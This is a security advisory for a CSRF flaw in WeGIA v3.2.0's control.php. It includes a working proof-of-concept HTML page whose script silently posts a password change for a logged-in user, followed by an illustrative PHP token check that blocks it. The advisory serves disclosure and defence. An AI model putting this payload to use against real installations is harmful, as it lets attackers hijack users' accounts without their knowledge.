CVE-2024-53472: CSRF in control.php to change password WeGIA
Vendor
WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions.
Affected Product Code Base
WeGIA - v3.2.0
Vulnerability Description
A Cross-Site Request Forgery (CSRF) vulnerability was identified in the WeGIA application. This flaw enables an attacker to induce an authenticated user to perform unintended actions without their consent or awareness.
POC
The page below allows an attacker to change the password of an authenticated user without their consent: the request is sent when the user loads this malicious page while logged into the application.
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>CSRF Exploit</title>
</head>
<body>
  <script>
    fetch("https://demo.wegia.org/controle/control.php", {
      method: "POST",
      headers: {
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": "_ga=GA1.1.1228908965.1730558983; PHPSESSID=1g73rg3pd1gp28a54amciflj9d; _ga_F8DXBXLV8J=GS1.1.1730838076.2.1.1730838109.27.0.0"
      },
      body: "senha_antiga=wegia&nova_senha=1234567&confirmar_senha=1234567&nomeClasse=FuncionarioControle&metodo=alterarSenha&redir=logout.php&id_pessoa=1&alterar=Alterar"
    })
      .then(response => response.text())
      .then(data => console.log(data))
      .catch(error => console.error('Error:', error));
  </script>
</body>
</html>
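The request above is accepted because nothing in it proves it came from the application's own form. The following is an added example of a server-side guard for that gap; it is not WeGIA's code or its actual fix. The function names and the `csrf_token` form field are assumptions made for illustration.

```php
<?php
declare(strict_types=1);
// Added example: hypothetical CSRF guard, not WeGIA's actual code.

// SameSite keeps the browser from attaching the session cookie to
// cross-site POSTs such as the PoC's fetch() (array form needs PHP >= 7.3).
function start_hardened_session(): void
{
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Strict',
    ]);
    session_start();
}

// One random token per session; emit it as a hidden field in every form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only when the submitted token matches the one stored in the session.
function csrf_token_is_valid(array $post, array $session): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($expected) && is_string($supplied)
        && $expected !== ''
        && hash_equals($expected, $supplied); // constant-time comparison
}

// Call at the top of the dispatcher, before routing on nomeClasse/metodo.
function require_csrf_token(): void
{
    if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST'
        && !csrf_token_is_valid($_POST, $_SESSION ?? [])) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
}
```

With this guard in place, the PoC's body (`metodo=alterarSenha` with no `csrf_token` field) is rejected with HTTP 403 before the password change runs, because a page on another origin cannot read the token stored in the victim's session.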
Reference
https://github.com/nilsonLazarin/WeGIA/issues/790
https://github.com/nilsonmori/WeGIA
Discoverer
Natan Maia Morette and Diego Cardoso Borda Castro, Nov 2024.